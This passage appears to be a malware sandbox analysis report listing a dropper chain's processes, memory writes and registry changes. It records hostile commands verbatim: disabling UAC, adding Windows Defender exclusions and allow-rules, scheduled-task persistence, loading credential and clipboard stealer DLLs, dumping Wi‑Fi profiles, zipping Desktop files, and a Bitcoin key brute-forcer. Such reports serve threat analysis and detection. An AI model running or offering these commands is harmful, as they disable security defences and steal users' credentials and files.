PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1680 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 1680 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 1680 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 4584 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 4584 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 4584 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 4584 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe
PID 4584 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe
PID 1680 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files (x86)\GameServerClient\GameService.exe
PID 1680 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files (x86)\GameServerClient\GameService.exe
PID 1680 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files (x86)\GameServerClient\GameService.exe
PID 2840 wrote to memory of 3444 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\Conhost.exe
PID 2840 wrote to memory of 3444 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\Conhost.exe
PID 1680 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 1680 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 1680 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 3444 wrote to memory of 4540 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\netsh.exe
PID 3444 wrote to memory of 4540 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\netsh.exe
PID 1680 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 1680 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 1680 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 4872 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 168 N/A C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe

"C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe"

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 200 -s 716

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 508

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 504

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe

"C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe

"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\735606991074_Desktop.zip' -CompressionLevel Optimal

C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"

C:\Users\Admin\Pictures\4bfKBpwrjclcPetR6QZGvVSR.exe

"C:\Users\Admin\Pictures\4bfKBpwrjclcPetR6QZGvVSR.exe"

C:\Users\Admin\Pictures\uULd8wDgkRpZYPF3wlNOaWaV.exe

"C:\Users\Admin\Pictures\uULd8wDgkRpZYPF3wlNOaWaV.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\A0DBxEb4CWJ5lqC6fVrKqGZv.exe

"C:\Users\Admin\Pictures\A0DBxEb4CWJ5lqC6fVrKqGZv.exe"

C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe

"C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "

C:\Users\Admin\Pictures\bR2wmEBEEi1em6seHLokEXnU.exe

"C:\Users\Admin\Pictures\bR2wmEBEEi1em6seHLokEXnU.exe"

C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe

"C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe"

C:\Users\Admin\Pictures\VX91subzGlh8JGsVl1hkHR4E.exe

"C:\Users\Admin\Pictures\VX91subzGlh8JGsVl1hkHR4E.exe"

C:\Users\Admin\Pictures\fndn0JFQGewyD6YAvv4IScwI.exe

"C:\Users\Admin\Pictures\fndn0JFQGewyD6YAvv4IScwI.exe"

C:\Windows\SysWOW64\sc.exe

Sc delete GameServerClient

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService remove GameServerClient confirm

C:\Users\Admin\AppData\Local\Temp\u4ck.0.exe

"C:\Users\Admin\AppData\Local\Temp\u4ck.0.exe"

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService start GameServerClient

C:\Program Files (x86)\GameServerClient\GameService.exe

"C:\Program Files (x86)\GameServerClient\GameService.exe"

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "

C:\Users\Admin\AppData\Local\Temp\u3ts.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u3ts.2\run.exe"

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe

"C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe" --silent --allusers=0

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2a0,0x2a4,0x2a8,0x120,0x2ac,0x6adfe1d0,0x6adfe1dc,0x6adfe1e8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\u1wfpxgDHV6skxM1Fy0QY0QV.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\u1wfpxgDHV6skxM1Fy0QY0QV.exe" --version

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe

"C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4312 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240425223045" --session-guid=3601f146-8a6b-45b1-8cf5-28306e354ae1 --server-tracking-blob="YjlkZWE3OTA5ZmE1ZDUzZjhlZjhkMDk4ZjNlNjkzY2U1OWVlOTI2ZTU2YjE0NDNiZGU5YTJiMWI4YjAxMzdhZjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fMTIzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MDg0MjIxLjI2ODUiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzEyMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMjA2Mzg3NjItYTUxZS00OGJmLTgwYWUtYjQ4NGM0ZjkzMDQwIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=C004000000000000

C:\Windows\SysWOW64\sc.exe

Sc delete GameServerClientC

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2ac,0x2b0,0x2b4,0x27c,0x2b8,0x69c2e1d0,0x69c2e1dc,0x69c2e1e8

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService remove GameServerClientC confirm

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService start GameServerClientC

C:\Program Files (x86)\GameServerClient\GameService.exe

"C:\Program Files (x86)\GameServerClient\GameService.exe"

C:\Program Files (x86)\GameServerClient\GameServerClientC.exe

"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\glS8pK7urpGl0V4Uglg8faYl.exe

"C:\Users\Admin\Pictures\glS8pK7urpGl0V4Uglg8faYl.exe" --silent --allusers=0

C:\Users\Admin\Pictures\N0l0UJd7MsNGmjMt43mJTRfK.exe

"C:\Users\Admin\Pictures\N0l0UJd7MsNGmjMt43mJTRfK.exe"

C:\Users\Admin\Pictures\glS8pK7urpGl0V4Uglg8faYl.exe

C:\Users\Admin\Pictures\glS8pK7urpGl0V4Uglg8faYl.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2a0,0x2a4,0x2a8,0x258,0x2ac,0x6926e1d0,0x6926e1dc,0x6926e1e8

C:\Users\Admin\Pictures\kNfpNDOUekHYoBya0eTdMtCT.exe

"C:\Users\Admin\Pictures\kNfpNDOUekHYoBya0eTdMtCT.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\glS8pK7urpGl0V4Uglg8faYl.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\glS8pK7urpGl0V4Uglg8faYl.exe" --version

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\AppData\Local\Temp\u3ts.3.exe

"C:\Users\Admin\AppData\Local\Temp\u3ts.3.exe"

C:\Users\Admin\AppData\Local\Temp\u4ck.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u4ck.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\Pictures\Hi4IYDKds9gYDcBNtiTroBud.exe

"C:\Users\Admin\Pictures\Hi4IYDKds9gYDcBNtiTroBud.exe"

C:\Users\Admin\Pictures\xwQ4rB9tg3am9UsDtsfZJtfz.exe

"C:\Users\Admin\Pictures\xwQ4rB9tg3am9UsDtsfZJtfz.exe"

C:\Users\Admin\AppData\Local\Temp\u4ck.3.exe

"C:\Users\Admin\AppData\Local\Temp\u4ck.3.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3F03.tmp\Install.exe

.\Install.exe /RvdidblCuX "385118" /S

C:\Users\Admin\AppData\Local\Temp\7zS40D8.tmp\Install.exe

.\Install.exe /RvdidblCuX "385118" /S

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\DgywIex.exe\" em /MFsite_idphQ 385118 /S" /V1 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dvsbjhP.exe\" em /tBsite_idQao 385118 /S" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Program Files (x86)\GameServerClient\GameServerClientC.exe

"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Windows\Temp\321938.exe

"C:\Windows\Temp\321938.exe" --list-devices

C:\Windows\Temp\660037.exe

"C:\Windows\Temp\660037.exe" --coin BTC -m ADDRESSES -t 0 --range 3ff830d86c0000000:3ff830d8700000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin

C:\Users\Admin\Pictures\VX91subzGlh8JGsVl1hkHR4E.exe

"C:\Users\Admin\Pictures\VX91subzGlh8JGsVl1hkHR4E.exe"

C:\Users\Admin\Pictures\fndn0JFQGewyD6YAvv4IScwI.exe

"C:\Users\Admin\Pictures\fndn0JFQGewyD6YAvv4IScwI.exe"

C:\Users\Admin\Pictures\A0DBxEb4CWJ5lqC6fVrKqGZv.exe

"C:\Users\Admin\Pictures\A0DBxEb4CWJ5lqC6fVrKqGZv.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x238,0x23c,0x240,0x20c,0x210,0x336038,0x336044,0x336050

C:\Users\Admin\Pictures\uULd8wDgkRpZYPF3wlNOaWaV.exe

"C:\Users\Admin\Pictures\uULd8wDgkRpZYPF3wlNOaWaV.exe"

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dvsbjhP.exe

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dvsbjhP.exe em /tBsite_idQao 385118 /S

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD 